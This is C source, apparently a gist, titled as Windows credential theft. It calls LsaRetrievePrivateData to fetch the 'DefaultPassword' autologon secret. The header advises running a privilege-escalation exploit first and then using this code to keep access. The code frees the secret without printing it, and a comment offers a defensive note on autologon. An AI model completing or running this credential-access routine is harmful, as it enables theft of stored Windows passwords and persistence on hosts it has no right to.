Created
October 19, 2017 15:23
LsaRetrievePrivateData User Credential Theft on Windows XP-7
/*
 * LsaRetrievePrivateData User Credential Theft on Windows XP-7
 * ============================================================
 *
 * Requires admin privileges to run effectively (use privilege escalation
 * exploit first then use this to get password so you are no longer dependent
 * on the exploit)
 *
 * Seen on reddit: https://www.reddit.com/r/Malware/comments/779v21/til_you_can_maintain_administrative_access/
 * Code from pastebin dump: https://pastebin.com/u992uP5e
 */
#include <Windows.h> | |
#include <stdio.h> | |
#include <NTSecAPI.h> | |
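/*
 * Opens the local LSA policy object, asks LsaRetrievePrivateData for the
 * private data object named "DefaultPassword", and then releases everything
 * it obtained. The returned buffer is freed without being read or printed.
 *
 * Returns ERROR_SUCCESS when both LSA calls succeed; otherwise prints and
 * returns the Win32 error code that corresponds to the failing call's
 * NTSTATUS.
 *
 * Defensive note: "DefaultPassword" is the LSA secret Windows uses for the
 * automatic-logon password when autologon is set up to store it that way, so
 * the object is only present on hosts configured for autologon. Not using
 * autologon for privileged accounts removes the stored credential.
 */
int wmain(void)
{
    NTSTATUS Status = 0;
    DWORD dwError = ERROR_SUCCESS;
    LSA_UNICODE_STRING uString;
    /* Both start as NULL so the FAILURE path never frees or closes an
     * indeterminate value when LsaOpenPolicy is the call that failed. */
    PLSA_UNICODE_STRING Data = NULL;
    LSA_HANDLE hHandle = NULL;
    LSA_OBJECT_ATTRIBUTES Attributes;
    LPCWSTR lpPassword = L"DefaultPassword";

    /* LsaOpenPolicy expects the attributes structure to be zeroed. */
    RtlZeroMemory(&Attributes, sizeof(Attributes));

    Status = LsaOpenPolicy(NULL, &Attributes, POLICY_ALL_ACCESS, &hHandle);
    if (Status != ERROR_SUCCESS) {
        goto FAILURE;
    }

    /* LSA_UNICODE_STRING lengths are byte counts held in USHORT fields;
     * MaximumLength also covers the terminating WCHAR of the literal. */
    uString.Buffer = (PWSTR)lpPassword;
    uString.Length = (USHORT)(wcslen(lpPassword) * sizeof(WCHAR));
    uString.MaximumLength = (USHORT)(uString.Length + sizeof(WCHAR));

    Status = LsaRetrievePrivateData(hHandle, &uString, &Data);
    if (Status != ERROR_SUCCESS) {
        goto FAILURE;
    }

    if (Data) {
        LsaFreeMemory(Data);
    }
    if (hHandle) {
        LsaClose(hHandle);
    }
    return ERROR_SUCCESS;

FAILURE:
    /* The LSA functions report failure through their NTSTATUS return value
     * and do not set the thread's last-error code, so GetLastError() would
     * yield a stale number here; translate the status instead. */
    dwError = LsaNtStatusToWinError(Status);
    if (Data) {
        LsaFreeMemory(Data);
    }
    if (hHandle) {
        LsaClose(hHandle);
    }
    /* DWORD is an unsigned long, hence %lu. */
    printf("Operation failed: %lu\r\n", dwError);
    return dwError;
}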